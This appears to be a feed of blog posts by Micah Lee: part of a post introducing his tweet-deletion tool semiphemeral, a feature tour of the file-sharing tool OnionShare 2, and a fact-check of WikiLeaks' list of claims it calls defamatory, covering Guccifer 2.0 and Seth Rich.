<p>I've also written several twitter threads that I like and don't want to delete, and that even get cited by others. I wrote a massive thread full of the <a href="https://twitter.com/micahflee/status/963852295271104512">sick misogynist details</a> from leaked internal WikiLeaks DMs; a short thread about the time police broke into Chelsea Manning's house <a href="https://twitter.com/micahflee/status/1004006878446153728">with guns drawn</a> for a "wellness check"; a thread detailing everything that is publicly known about <a href="https://twitter.com/micahflee/status/1088511697550172160">supply chain attacks</a>; a thread about a 2-year-long <a href="https://twitter.com/micahflee/status/990265575711617030">honeypot laptop</a> project I did to try to detect evil maid attacks; among many others. And there are other tweets I don't want to delete too -- I don't mean to brag but occasionally I say something incredibly clever. And there's the <a href="https://twitter.com/micahflee/status/908390382882373632">tweet</a> that cryptographically proves that the person who controls my Keybase account also controls my Twitter account.</p>
<p>I realized that I didn't want ephemeral tweets, I wanted <em>semiphemeral</em> tweets. I want to automatically delete my old tweets except for those that meet specific criteria: if a tweet has more than a specific thresholds of retweets or likes, keep it. Also keep any other tweets that are part of a thread that includes a tweet I'm preserving -- I don't want to only keep the first tweet that passes the tweet/like threshold but then delete all the replies, or otherwise lose context. And of course, I wanted a way to tag specific tweets for exclusion from deletion.</p>
<p>So, I programmed semiphemeral to do just that. <a href="https://github.com/micahflee/semiphemeral">The code</a> is licensed under MIT and programmed in python. Everyone is welcome to use it, but you'll need some tech skills to do so. It's a command line tool, not a service. And to use it, you need to generate Twitter API credentials with your Twitter account (roughly following <a href="https://python-twitter.readthedocs.io/en/latest/getting_started.html">these instructions</a>) -- this means you'll be interfacing with the Twitter API directly, rather than giving some third party permission to access your Twitter account. It will work fine to run on your laptop, but if you want to make it automatically delete old tweets going forward, you'll probably want to schedule it to run on a daily cron job on a server somewhere.</p>
<p>You can install it with pip:</p>
<pre><code>$ pip3 install semiphemeral
</code></pre>
<p>Here's how to use it:</p>
<pre><code>$ semiphemeral
Usage: semiphemeral [OPTIONS] COMMAND [ARGS]...
Automatically delete your old tweets, except for the ones you want to keep
Options:
--help Show this message and exit.
Commands:
configure Start the web server to configure semiphemeral
delete Delete tweets that aren't automatically or manually excluded
fetch Download all tweets
stats Show stats about tweets in the database
</code></pre>
<p>When you run <code>semiphemeral configure</code>, a local web app starts (powered by <a href="http://flask.pocoo.org/">flask</a>) which you load in a web browser. From here you can configure semipheral with both your Twitter API credentials, as well as the settings you want to use -- how old tweets are when they should get automatically deleted, what the retweet and like thresholds should be, as well as when to automatically unretweet and unlike old tweets.</p>
<p>Here's what the settings web page looks like:</p>
<p><img src="semiphemeral-settings.png" alt=""></p>
<p>This web app also has an interface that lets you view all tweets that are staged for deletion a page at a time, filter the text of the tweets for words and phrases to quickly find specific ones, and manually exclude any tweets you choose from deletion.</p>
<p>After configuring your API creds, you must download your entire timeline from Twitter by running <code>semiphemeral fetch</code>. This may take a very long time the first time if you have a lot of tweets. Semiphemeral will automatically pause, sometimes for up to 15 minutes at a time, when it hits the Twitter API's rate limit. (All the Twitter API code is powered by <a href="https://tweepy.readthedocs.io/en/latest/">tweepy</a>), and it saves your entire history of tweets, as well as all the tweets from threads you've interacted with, in a sqlite database. The database code is powered by <a href="https://www.sqlalchemy.org/">SQLAlchemy</a>.</p>
<p>(Side note: Did you know that Twitter "threads" are actually trees, from a data structure perspective? If a tweet is not replying to any other tweet, it's the root of the tree. It can have an arbitrary number of replies, and each of those replies can have an arbitrary number of replies of their own, which are the branches. If I replied to someone but their account has since been suspended or they deleted the tweet I replied to, my tweet is an orphan, and there's no easy way to determine what the root of its thread actually was.)</p>
<p>And finally, after you're sure you've configured the settings you want and have sifted through all your old tweets and manually excluded any specific tweets from deletion, you may want to <a href="https://help.twitter.com/en/managing-your-account/how-to-download-your-twitter-archive">download your Twitter archive</a> for safe keeping. Then, run <code>semiphemeral delete</code> to delete all of your old tweets, except for the ones you want to keep. This, too, might take a long time the first run. I've designed it to put <code>semiphemeral delete</code> in a daily cron job, to continue to delete old tweets going forward.</p>
<p>At the moment tweepy has <a href="https://github.com/tweepy/tweepy/issues/1081">a bug</a> that prevents the direct message API from working. But once that's fixed (or maybe before, if I have time and am feeling adventurous) I plan on adding a feature to also automatically delete all old direct messages.</p>
<p>Settings are stored in <code>~/.semiphemeral/settings.json</code>. All tweets (including exceptions, and deleted tweets) are stored in a sqlite database <code>~/.semiphemeral/tweets.db</code>.</p>
<p>Now that I've deleted about 90% of my tweets, and all retweets that are newer than the past month, I feel like my Twitter account is in a much cleaner state than it was before, and there's so much less historical information about my daily likes and politics available to anyone who chooses to look than there used to be. I think I'm going to enjoy semiphemeral tweeting.</p>
<pre><code>$ semiphemeral stats
semiphemeral 0.1
Statistics
{
"is_configured": true,
"last_fetch": "2019-06-05 07:39AM",
"my_tweets": 1353,
"my_retweets": 127,
"my_likes": 3987,
"deleted_tweets": 12005,
"deleted_retweets": 8917,
"unliked_tweets": 2365,
"excluded_tweets": 192,
"other_tweets": 9537,
"threads": 3949
}
</code></pre>
OnionShare 2 adds anonymous dropboxes, supports new Tor addresses, and is translated into a dozen new languages2019-02-18T00:00:00ZMicah Leeurn:uuid:45f91085-ec3d-3eae-aa95-ef20090a514b<p>After nearly a year of work from a <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">growing community</a> of developers, designers, and translators, I'm excited that OnionShare 2 is finally ready. You can download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>OnionShare is an open source tool for securely and anonymously sending and receiving files using Tor onion services. It works by starting a web server directly on your computer and making it accessible as an unguessable Tor web address that others can load in <a href="https://www.torproject.org/">Tor Browser</a> to download files from you, or upload files to you. It doesn't require setting up a separate server, using a third party file-sharing service, or even logging into an account.</p>
<p>Unlike services like email, Google Drive, DropBox, WeTransfer, or nearly any other way people typically send files to each other, when you use OnionShare you don't give any companies access to the files that you're sharing. So long as you share the unguessable web address in a secure way (like pasting it in an encrypted messaging app), <em>no one</em> but you and the person you're sharing with can access your files.</p>
<p>Here's a tour of some of the new parts of OnionShare 2.</p>
<ul>
<li><a href="#sharing-files-with-onionshare">Sharing files with OnionShare</a></li>
<li><a href="#the-macos-sandbox">The macOS sandbox</a></li>
<li><a href="#next-generation-onion-services">Next generation onion services</a></li>
<li><a href="#onionshare-doesn-t-zip-if-you-share-just-one-file">OnionShare doesn't zip if you share just one file</a></li>
<li><a href="#onionshare-addresses-are-ephemeral-by-default">OnionShare addresses are ephemeral by default</a></li>
<li><a href="#receiving-files-with-onionshare">Receiving files with OnionShare</a></li>
<li><a href="#only-open-things-from-people-you-trust-or-if-you-know-what-you-are-doing">Only open things from people you trust, or if you know what you are doing</a></li>
<li><a href="#public-onionshare-addresses">Public OnionShare addresses</a></li>
<li><a href="#running-an-anonymous-dropbox">Running an anonymous dropbox</a></li>
<li><a href="#onionshare-in-your-language">OnionShare in your language</a></li>
</ul>
<h3 id="sharing-files-with-onionshare">Sharing files with OnionShare</h3><p>Here's what OnionShare 2 looks like. When you first open it, it connects to the Tor network.</p>
<p><img src="connecting-to-tor.png" alt=""></p>
<p>Once you're connected, you're in the "Share Files" tab (I'll talk more about the new "Receive Files" tab below).</p>
<p><img src="share-mode1.png" alt=""></p>
<p>To securely and anonymously share files with someone, just drag and drop the files into the OnionShare window. Alternatively, you can click the "Add Files" and "Add Folder" buttons to browse your filesystem.</p>
<h3 id="the-macos-sandbox">The macOS sandbox</h3><p>In Windows and Linux there's just a single "Add" button that lets you select both files and folders. The reason for two separate buttons in the macOS version is a bit complicated, but boils down to a cool new security feature: The macOS sandbox is turned on in OnionShare 2, which means that even if someone manages to exploit a vulnerability in OnionShare to try to hack your computer, they still won't be able to access your data or run programs on your computer without first escaping the sandbox.</p>
<p><img src="share-mode2.png" alt=""></p>
<p>I've dragged all of the files that make up the OnionShare source code into the window. Now, to make them accessible to someone else, I just click "Start sharing".</p>
<h3 id="next-generation-onion-services">Next generation onion services</h3><p><img src="share-mode3.png" alt=""></p>
<p>After clicking the button, I wait a few seconds, and then OnionShare gives me an unguessable Tor address to share. This is also new in OnionShare 2: By default, it uses <a href="https://blog.torproject.org/tors-fall-harvest-next-generation-onion-services">next generation Tor onion services</a>, also known as <code>v3</code> onion addresses. These are onion addresses that look like <code>lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion</code>, as opposed to the old <code>v2</code> kind, that look like <code>elx57ue5uyfplgva.onion</code>.</p>
<p><code>v3</code> onions are much more secure than <code>v2</code> onions for a variety of reasons, but they can be a bit unwieldy and hard to type (for example, if you're using OnionShare to move files between two computers that are both in front of you). You can still use <code>v2</code> onion addresses if you want by going into Settings and choosing "Use legacy addresses".</p>
<p>Also, you might notice that the OnionShare address is using HTTP and not HTTPS, but this is actually perfectly fine. HTTPS adds a layer of encryption between a web browser and a web server, but Tor onion services are already end-to-end encrypted, so HTTPS is not necessary (it's also not feasible without browser warnings: Let's Encrypt doesn't sign HTTPS certificates for <code>.onion</code> sites). Unlike loading normal websites in Tor Browser, when you load onion websites, there is no Tor exit node that could spy on the traffic -- all of the traffic stays within the Tor network.</p>
<p>Now, I need to send this web address to my friend who I'm sharing files with. The easiest way to do this securely is to use an encrypted messaging app like Signal Desktop, Wire, Keybase, or iMessage -- or, if you're oldschool, Jabber/OTR. If the files you're sharing aren't especially sensitive, you can also share this web address in a way that is easily spied on but might be more convenient, like in a Facebook, Twitter, Google Hangouts, Slack, or Discord message, or in an email.</p>
<p><img src="torbrowser-share1.png" alt=""></p>
<p>My friend then opens Tor Browser and loads the OnionShare address I sent her. She sees a website with a list of the files I'm sharing, and a "Download Files" button.</p>
<p>The key thing to understand about how OnionShare works is that this website is hosted <em>directly on my laptop</em>, not on a server in a data center somewhere. If I suspend my laptop, that link won't work anymore. If I close OnionShare before the files have been downloaded, then that Tor web address simply disappears from the internet. Because of this, OnionShare always takes place in real-time -- you and the person you're sharing files with need to both be online <em>at the same time</em>.</p>
<h3 id="onionshare-doesn-t-zip-if-you-share-just-one-file">OnionShare doesn't zip if you share just one file</h3><p>My friend then downloads the files, which are automatically zipped up. In this case, the zip file is called <code>onionshare_snwga4.zip</code> (the last part of the filename is random), and when she unzips it, she can see a copy of the OnionShare source code I sent. A new feature in OnionShare 2 is that if you share just a single file, it no longer zips it up (but still compresses it with gzip, built into the HTTP protocol).</p>
<p><img src="share-mode4.png" alt=""></p>
<p>Back on my computer, OnionShare automatically stopped sharing the moment the files finished sending -- and when this happened, the OnionShare address completely disappeared from the internet, never to exist again.</p>
<h3 id="onionshare-addresses-are-ephemeral-by-default">OnionShare addresses are ephemeral by default</h3><p>OnionShare addresses are <em>ephemeral</em>, and intended for one-time use. (For example, if someone sends you an OnionShare address in a Twitter DM, and a few minutes later you load it and download the files, that address won't exist anymore in the future. If anyone ever gains access to your Twitter DM history, that OnionShare address will no longer work.)</p>
<p><img src="torbrowser-share2.png" alt=""></p>
<p>As you can see, after my friend finished downloading the files I sent her, that OnionShare address ceased to exist.</p>
<p>This is the default behavior of OnionShare, but you might want to use OnionShare to send files to a group of people, not just one person, in which case you don't want it to be ephemeral. In this case, you can uncheck "Stop sharing after files have been sent" in the Settings, and then multiple people can download your files, and you'll continue sharing until you manually click "Stop sharing" or close OnionShare.</p>
<h3 id="receiving-files-with-onionshare">Receiving files with OnionShare</h3><p><img src="receive-mode1.png" alt=""></p>
<p>All of this is, more or less, how OnionShare has always worked. But the "Receive Files" tab is brand new to OnionShare 2. And it's still just the beginning -- we have plans for adding more tabs to OnionShare in the future, such as a <a href="https://github.com/micahflee/onionshare/issues/791">static website sharing</a> tab.</p>
<p>When you use OnionShare to receive files, you turn your computer into an anonymous dropbox -- I like to think of it is a super lightweight version of <a href="https://securedrop.org/">SecureDrop</a> that anyone can run on their own laptop, for free, without needing to set up any infrastructure or do any systems administration. (However, it's not as robust, or secure, as SecureDrop, which enforces isolated environments in a way that OnionShare can't.)</p>
<p><img src="receive-mode2.png" alt=""></p>
<p>A few seconds after I clicked "Start Receive Mode", OnionShare gave me an unguessable Tor address, which I share with my friend the same way I did with the share mode address. But this time, instead of me sending files to her, <em>she can send files to me</em>, and all she needs is Tor Browser -- she doesn't need OnionShare herself.</p>
<p>If I publish this OnionShare address, <em>anyone can send files to me</em>, without me having any way to know who they are (because they'll be using Tor), and in a way that is end-to-end encrypted, so eavesdroppers spying on either of our networks can't access the files, or even realize that we're using OnionShare. To network eavesdroppers, all they'll be able to tell is that we're both using Tor.</p>
<p><img src="torbrowser-receive1.png" alt=""></p>
<p>My friend simply clicks Browse, finds the files she wants to send, and clicks "Send Files".</p>
<p><img src="receive-mode3.png" alt=""></p>
<p>Over in OnionShare on my computer, I can see the status of all of the files that I'm receiving. Because OnionShare uses Tor onion services, I don't actually have any way of knowing <em>who</em> is sending files to me -- if I want to make it so only very specific people can send me files, I need to securely share the OnionShare address to only those people. My computer will continue to act as an anonymous dropbox until I click "Stop Receive Mode", or close OnionShare. And, just like with share mode, if I suspend my laptop, the OnionShare address stops working.</p>
<p><img src="receive-mode-finder.png" alt=""></p>
<p>The files that I receive get saved to <code>~/OnionShare</code>, and they're automatically organized by date and time.</p>
<h3 id="only-open-things-from-people-you-trust-or-if-you-know-what-you-are-doing">Only open things from people you trust, or if you know what you are doing</h3><p>Now that you know how the "Receive Files" tab works, <em>be very careful with it</em>, and make sure to take the prominent warning to heart:</p>
<blockquote><p><strong>Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.</strong></p>
</blockquote>
<p>All of the warnings about not opening email attachments apply just as much here. In this example, I received <code>gimp-2.10.8-x86_64-2.dmg</code>, which is an installer for the open source image editing software GIMP. But, it could easily be a modified version of that installer that has malware hidden inside. And if someone sends you <code>.docx</code> or <code>.pdf</code> files, they could contain malware that could try to hack you through a vulnerability in Microsoft Word or Adobe Reader. How to safely open files you receive is <em>outside of the scope of OnionShare</em>. Use this feature with caution.</p>
<h3 id="public-onionshare-addresses">Public OnionShare addresses</h3><p>OnionShare 2 has a new feature: Public mode. But before explaining what it does, first I'll explain how OnionShare addresses work without it.</p>
<p>By default, OnionShare addresses look <code>http://[tor-address].onion/[slug]</code>, where the slug is two random words out of a list of words 7,776 words (technically, this is a 2-word <a href="https://theintercept.com/2015/03/26/passphrases-can-memorize-attackers-cant-guess/">diceware passphrase</a>).</p>
<p>The idea is that if an attacker could figure out the <code>tor-address</code> part of the address, they still can't download the files you're sharing, or upload files to your computer, without first knowing the slug. The slug is, essentially, a password. (This is less important when using <code>v3</code> onion services. The old <code>v2</code> onion services have a known issue where, if the onion connection happens to get facilitated by a malicious Tor node, that node could learn the <code>tor-address</code> part. This is one of the reasons that <code>v3</code> onions are more secure.)</p>
<p>But the slug is only two words, so what stops the attacker from guessing it, by guessing every possible 2-word slug? The wordlist that OnionShare uses is public, after all.</p>
<p><img src="slug-guess.png" alt=""></p>
<p>OnionShare counts how many 404 errors (file not found web requests), and on the 20th 404 error, it assumes that someone it trying to guess the slug and automatically stops the server.</p>
<p>This gives the attacker 20 chances to guess the two words correctly. Because the words are chosen from a list of 7,776 words, that means there are 7,776^2, or over 60 million, possible slugs. Which basically means that if an attacker tries to guess the slug, they have a 0.00003% chance of getting it right within their only 20 chances, and a 99.99996% chance of failing, and forcing OnionShare to stop sharing.</p>
<p>This works great, but what if you <em>want</em> anyone to be able to load your OnionShare address?</p>
<p>For example, let's say you want to anonymously publish some files. You disable the "Stop sharing after files have been sent" setting, drag the files into OnionShare, start sharing, and tweet the OnionShare address. It turns out that anyone on the internet that sees the tweet can force your server to stop just by making 20 404 errors. (This situation actually happened, by the way, and their server kept shutting down because people kept making 404 errors.)</p>
<p>This is the use case that public mode was built for. If you want to publicly share an OnionShare address, just go to Settings and check the box next to "Public mode". When you start sharing, the OnionShare address will look like <code>http://[tor-address].onion/</code>, without the slug, and the server will remain up no matter how many 404 errors it gets.</p>
<h3 id="running-an-anonymous-dropbox">Running an anonymous dropbox</h3><p>You've seen receive mode, which is great for allowing people to privately send you files. But if you want to allow <em>anyone</em> to privately send you files, there are a few settings you'll want to consider using.</p>
<p>First, you'll definitely want to enable public mode.</p>
<p>Second, you'll also want to go into Settings and enable "Use a persistent address". With this setting, when you stop an OnionShare server and then start it again, you'll get this exact same onion address as you had last time. This gives you the flexibility to, for example, reboot your computer and start OnionShare again, without having to switch OnionShare addresses.</p>
<p>And finally, you may want to run your anonymous dropbox on a headless Linux server, rather than your normal daily workstation. OnionShare comes with two binaries, <code>onionshare</code> (the command line version) and <code>onionshare-gui</code> (the graphical version). Both of them share the same configuration file -- in Linux, this is in <code>~/.config/onionshare/onionshare.json</code>. So, using the graphical version of OnionShare, choose all of the settings that you'd like, and then copy <code>onionshare.json</code> to your server, and run OnionShare like this:</p>
<pre><code>$ onionshare --receive
OnionShare 2.0 | https://onionshare.org/
Connecting to the Tor network: 100% - Done
Setting up onion service on port 17612.
* Running on http://127.0.0.1:17612/ (Press CTRL+C to quit)
Files sent to you appear in this folder: /home/user/OnionShare
Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.
Give this address to the sender:
http://v2oxpolhvyd3kh44drt6gtz57v7wwun2twddcw3xhim2kgu2vvcewvqd.onion
Press Ctrl+C to stop the server
127.0.0.1 - - [18/Feb/2019 10:48:04] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:06] "GET /static/css/style.css HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/receive-noscript.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/receive.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/js/jquery-3.3.1.min.js HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:07] "GET /static/img/logo.png HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:08] "GET /static/img/logo_large.png HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:10] "GET /static/img/favicon.ico HTTP/1.1" 200 -
Feb 18, 10:48AM: Upload of total size 102.1 KiB is starting
=> 101.9 KiB 2016_tax_return.pdf
Received: /home/user/OnionShare/2019-02-18/10.48.18/2016_tax_return.pdf
127.0.0.1 - - [18/Feb/2019 10:48:20] "POST /upload-ajax HTTP/1.1" 200 -
127.0.0.1 - - [18/Feb/2019 10:48:21] "GET /static/img/ajax.gif HTTP/1.1" 200 -
</code></pre>
<h3 id="onionshare-in-your-language">OnionShare in your language</h3><p><img src="onionshare-persian.png" alt=""></p>
<p>Finally, one of the things I'm most excited about OnionShare 2 is that it has now been translated into twelve new languages, making OnionShare accessible to a considerable swath of humanity. Some of the major languages that OnionShare 2 is translated in include Spanish (400 million native speakers), Portuguese (215 million), Russian (170 million), and Japanese (130 million). (These numbers <a href="https://www.babbel.com/en/magazine/the-10-most-spoken-languages-in-the-world">come from</a> Babbel magazine.)</p>
<p>The new languages include: Bengali (বাংলা), Catalan (Català), Danish (Dansk), French (Français), Greek (Ελληνικά), Italian (Italiano), Japanese (日本語), Persian (فارسی), Brazilian Portuguese (Português Brasil), Russian (Русский), Spanish (Español), and Swedish (Svenska), and more languages will be included in the future. If you're a native speaker of a non-English language and are interested in contributing to OnionShare, you can find <a href="https://github.com/micahflee/onionshare/wiki/Translating">instructions</a> for helping on the wiki.</p>
<p>I hope you like OnionShare 2!</p>
Lies That WikiLeaks Tells You2019-01-11T00:00:00ZMicah Leeurn:uuid:9b0d405b-885f-3528-ac72-c32880499421<p>Last weekend, WikiLeaks sent an email to journalists with a list of 140 things not to say about WikiLeaks and Julian Assange because they are "false and defamatory." Reuters first <a href="https://www.reuters.com/article/us-britain-ecuador-assange/wikileaks-tells-reporters-140-things-not-to-say-about-julian-assange-idUSKCN1P00NN">broke</a> the story, and the next day Emma Best <a href="https://emma.best/2019/01/07/140-things-youre-not-allowed-to-say-about-assange-or-wikileaks/">published</a> the complete list. Many of the things on the list can't actually be "false" because they're subjective or nuanced ("It is false and defamatory to suggest that Julian Assange is a 'hacker'"), and many aren't defamatory, even if they are false ("It is false and defamatory to suggest that Julian Assange’s profession is 'computer programmer'.").</p>
<p>And many of the the things on the list are <em>true</em>, and WikiLeaks/Assange are being misleading. Some directly relate to me -- they came from Twitter fights I've with WikiLeaks and its minions. So I thought I'd fact check WikiLeaks' "false and defamatory" censorship list. This is by no means an exhaustive fact check -- for example, I'm not not covering the list items about the two Swedish women who accused Assange of rape, though I'm pretty confident a lot of that stuff is misleading as well. Before digging into the misinformation, I first want to take a moment to discuss how pathetic this is.</p>
<p>First, the email starts out with, "CONFIDENTIAL LEGAL COMMUNICATION. NOT FOR PUBLICATION," but whoever sent a copy of it to Reuters and Emma Best didn't break any off-the-record agreement with WikiLeaks. That's not how that works, which WikiLeaks really ought to know. Simply stating that your email is not for publication doesn't make it off-the-record -- both parties have to agree.</p>
<p>Second, while it's been clear for some time that WikiLeaks isn't the pro-transparency, pro-free speech, anti-censorship organization that it pretends to be, this latest feeble attempt at ego-driven image management is just sad. It reminds me of when WikiLeaks <a href="https://www.newsweek.com/wikileaks-documentary-makers-accuse-assange-censorship-626613">used legal threats to try to censor</a> the documentary film <em>Risk (2016)</em> because the filmmakers wouldn't remove scenes of Assange, who consented to being filmed, making sexist comments about women.</p>
<h3 id="secret-dms-with-donald-trump-jr">Secret DMs with Donald Trump, Jr.</h3><p>In November 2017, the Atlantic <a href="https://www.theatlantic.com/politics/archive/2017/11/the-secret-correspondence-between-donald-trump-jr-and-wikileaks/545738/">revealed</a> secret Twitter direct messages between @wikileaks and @DonaldJTrumpJr. WikiLeaks did most of the fanboying, but Trump Jr. responded some of the time, too.</p>
<p>Highlights of the exchange include:</p>
<ul>
<li>WikiLeaks asked Trump Jr. to, "Leak us one or more of your father’s tax returns," arguing that biased liberal media might publish them at any time, and that, "If we publish them it will dramatically improve the perception of our impartiality," adding, "That means that the vast amount of stuff that we are publishing on Clinton will have much higher impact, because it won’t be perceived as coming from a ‘pro-Trump’ ‘pro-Russia’ source." (Had Trump sent Assange a tax return, I have no doubt that WikiLeaks would have pretended it came from a whistleblower, rather than being an officially sanctioned leak.)</li>
<li>WikiLeaks suggested that Trump scream about rigged elections if he lost against Clinton: “Hi Don if your father ‘loses’ we think it is much more interesting if he DOES NOT conceed [sic] and spends time CHALLENGING the media and other types of rigging that occurred -- as he has implied that he might do.”</li>
</ul>
<p>After Trump won the election:</p>
<ul>
<li>WikiLeaks asked if president-elect Trump could award Assange with an Australian ambassadorship: "It would be real easy and helpful for your dad to suggest that Australia appoint Assange ambassador to [Washington,] DC."</li>
</ul>
<p>Now, back to the "false and defamatory" claims.</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks has ever colluded with or conspired with, or compromised the integrity of its journalism for, any political campaign or State [in fact, published communication records show WikiLeaks doing exactly the opposite: rejecting approaches by Cambridge Analytica and the Trump campaign for information on its pending publications, see <a href="https://defend.wikileaks.org/">https://defend.wikileaks.org/</a>].</em></p>
<p>I'd argue that the secret exchange with Trump Jr. is "conspiring with" a political campaign, and that it compromised the integrity of WikiLeaks as an objective news organization. Had they been up-front about their pro-Trump bias the entire time, it would have still been unethical, but it wouldn't have been such a betrayal.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks tried to have the Trump administration appoint Julian Assange as an ambassador or to have any other person or state appoint him as an ambassador.</em></p>
<p>This one is a pretty blatant lie, considering WikiLeaks tried to have the Trump administration get Australia to appoint Julian Assange as an ambassador. And it doesn't really help Assange's case that he tweeted about it:</p>
<p><img src="wikileaks-ambassadorship.png" alt=""></p>
<h3 id="guccifer-2-0-the-gru-run-persona-that-provided-wikileaks-with-dnc-and-podesta-emails">Guccifer 2.0, the GRU-run persona that provided WikiLeaks with DNC and Podesta emails</h3><p>Guccifer 2.0, the online persona that claimed to be a Romanian "lone hacker," took credit for hacking into the DNC, and began leaking DNC emails to journalists. But the Mueller investigation released a <a href="https://theintercept.com/2018/07/18/mueller-indictment-russian-hackers/">mountain of evidence</a> that shows that this persona, along with faux-leak site DCLeaks, the hackers responsible for the spearphishing campaign that hacked Clinton campaign chairman John Podesta's Gmail account, and the hackers who hacked the DCCC and DNC networks, are all controlled by specific Russian military intelligence officers, working for the GRU.</p>
<p>Check the link above for more details, but here's a quick example. The spearphishing email that hacked Podesta's account included it Bitly link. The email address that registered that Bitly account, "dirbinsaabol@mail.com," was also used to sign up for an "online cryptocurrency service" (probably BitPay), and that account was used to pay for registering the domain dcleaks.com. Oh, also, the @Guccifer_2 Twitter account always logged in from a VPN service, except for once, when they <a href="https://www.thedailybeast.com/exclusive-lone-dnc-hacker-guccifer-20-slipped-up-and-revealed-he-was-a-russian-intelligence-officer">apparently forgot to connect to the VPN</a> and logged in from an IP address that geolocated to a GRU building in Moscow.</p>
<p>According to Mueller's indictment of GRU hackers, WikiLeaks contacted Guccifer 2.0 asking that they "[s]end any new material [stolen from the DNC] here for us to review and it will have a much higher impact than what you are doing." When Guccifer 2.0 ignored them, they asked again a few weeks later: “if you have anything hillary related we want it in the next tweo [sic] days prefable [sic] because the DNC [Democratic National Convention] is approaching and she will solidify bernie supporters behind her after," adding that "we think trump has only a 25% chance of winning against hillary … so conflict between bernie and hillary is interesting."</p>
<p>In response, Guccifer 2.0 sent a plaintext email to WikiLeaks, with an encrypted attachment called "wk dnc link1.txt.gpg" saying, "the encrypted file contained instructions on how to access an online archive of stolen DNC documents." Just over a week later, WikiLeaks began publishing the DNC emails.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange is, or has ever been, close to the Russian state, the Kremlin or Vladimir Putin.</em></p>
<p>So this one is a bit more nuanced. The source for WikiLeak's most influential leak, the DNC and Podesta emails, was a bunch of GRU officers trying to influence the 2016 election. And at various times WikiLeaks spread misinformation in order to protect their source's identity (see below). But does this mean that WikiLeaks or Julian Assange was "close to" the GRU?</p>
<p>Guccifer 2.0 was also a source for many other journalists (although, they all named their source as Guccifer 2.0; WikiLeaks pretended their source was a whistleblower), and it's plausible that Assange didn't realize he was communicating with GRU officers and thought it was a "lone hacker." So, I'm not really sure. But in any case, it's ridiculous for WikiLeaks to thinks this topic should be off limits to journalists considering the Russian military hacked a U.S. political party, leaked emails to WikiLeaks, and they published them at key points in order to hurt the Clinton campaign. And once it became clear to Assange who his source actually was, he chose to keep up the misinformation.</p>
<h2 id="assange-breathing-life-into-the-seth-rich-conspiracy-theory">Assange breathing life into the Seth Rich conspiracy theory</h2><p>Shortly after WikiLeaks began publishing DNC emails, Assange went on a Dutch TV and <a href="https://www.dispatch.com/news/20180715/wikileaks-founder-assange-lied-to-protect-russia-charges-on-hacked-emails-suggest">encouraged</a> the conspiracy theory that Seth Rich, a former DNC staffer who was killed in Washington, DC in what police believe was a botched robbery, was his source, and that the Democrats had him murdered for leaking emails to WikiLeaks. The exchange goes like this:</p>
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/Kp7FkLBRpKg" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p><strong>Assange brings up Seth Rich out of nowhere:</strong> "There's a 27-year-old, who works for the DNC, who was shot in the back -- murdered -- just a few weeks ago, for unknown reasons as he was walking down the street in Washington."</p>
<p><strong>Host:</strong> "That was just a robbery, I believe, wasn't it?"</p>
<p><strong>Assange:</strong> "No. There's no finding."</p>
<p><strong>Host:</strong> "What are you suggesting?"</p>
<p><strong>Assange:</strong> "I'm suggesting that our sources take risks, and they become concerned to see things occurring like that--"</p>
<p><strong>Host:</strong> "But was he one of your sources then?"</p>
<p><strong>Assange:</strong> "We don't comment on who our sources are, but--"</p>
<p><strong>Host:</strong> "Then why make the suggestion? About a young guy being shot in the streets of Washington?"</p>
<p><strong>Assange:</strong> "Because we have to understand how high the stakes are in the United States, and that our sources are -- you know, our sources face serious risks. That's why they come to us, so that we can protect their anonymity."</p>
<p><strong>Host:</strong> "But it's quite something to suggest a murder. That's basically what you're doing."</p>
<p><strong>Assange:</strong> "Well, others have suggested that. We are investigating to understand what happened in that situation, with Seth Rich. I think it is a concerning situation. There's not a conclusion yet, we wouldn't be willing to say a conclusion, but we are concerned about it. And more important, a variety of WikiLeaks sources are concerned when that kind of thing happens."</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange claimed that any person or entity was their source for WikiLeaks’ 2016 U.S. election publications [it is defamatory because Julian Assange’s professional reputation is substantially based on source protection].</em></p>
<p>So yup, that's a straight up lie. I guess unless you try to argue that Assange's interaction on that show wasn't a "claim".</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote alleged conspiracy theories claiming “John Podesta engaged in satanic rituals”, the “Democratic Party had Seth Rich Killed”, “Clinton wore earpieces to the 2016 US election debates”, on “Clinton’s health” or “Clinton kidnapping children”.</em></p>
<p>That's another lie. Assange definitely "uttered" and "tried to promote" the Seth Rich conspiracy theory.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever stated or suggested that any particular person was their source for any publication, including Seth Rich.</em></p>
<p>Another lie.</p>
<p>Also, Assange didn't just suggest that Seth Rich was his source, he also actively lied about who his source <em>wasn't</em>. As a guest on Sean Hannity's Fox News show (Assange is a classy guy, I know), he said: "Our source is not the Russian government, and is not a state party."</p>
